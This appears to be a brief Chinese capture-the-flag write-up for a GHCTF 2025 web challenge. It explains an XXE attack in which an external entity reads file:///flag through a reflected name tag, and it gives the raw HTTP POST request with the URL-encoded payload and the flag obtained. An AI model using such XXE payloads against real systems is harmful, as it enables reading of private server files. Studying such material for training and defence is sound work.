Problem: [GHCTF 2025](https://www.nssctf.cn/problem/6578)
审计玩发现要做/ghctf闯入xml
它会读取xml
因此我们注入的xml就要获得我们要的flag
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///flag">]>
<root>
<name>&xxe;</name>
</root>
这是是一个典型的 XXE(XML External Entity)攻击载荷
审计后发现name标签会被读取,我们获得file:///flag就行了
file://:URI 协议,表示访问本地文件系统
/flag:常见 CTF 比赛中 flag 文件的默认存储路径
如果没有的话得重新ls 找起来
但这结束了
POST /ghctf HTTP/1.1
Host: node1.anna.nssctf.cn:28950
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1727873749,1728461632
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
xml=%3C%21DOCTYPE%20root%20%5B%0A%20%20%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fflag%22%3E%0A%5D%3E%0A%3Croot%3E%0A%20%20%3Cname%3E%26xxe%3B%3C%2Fname%3E%0A%3C%2Froot%3E
NSSCTF{56d4e8df-0eb8-4be0-9cb9-1efa004bd0b5}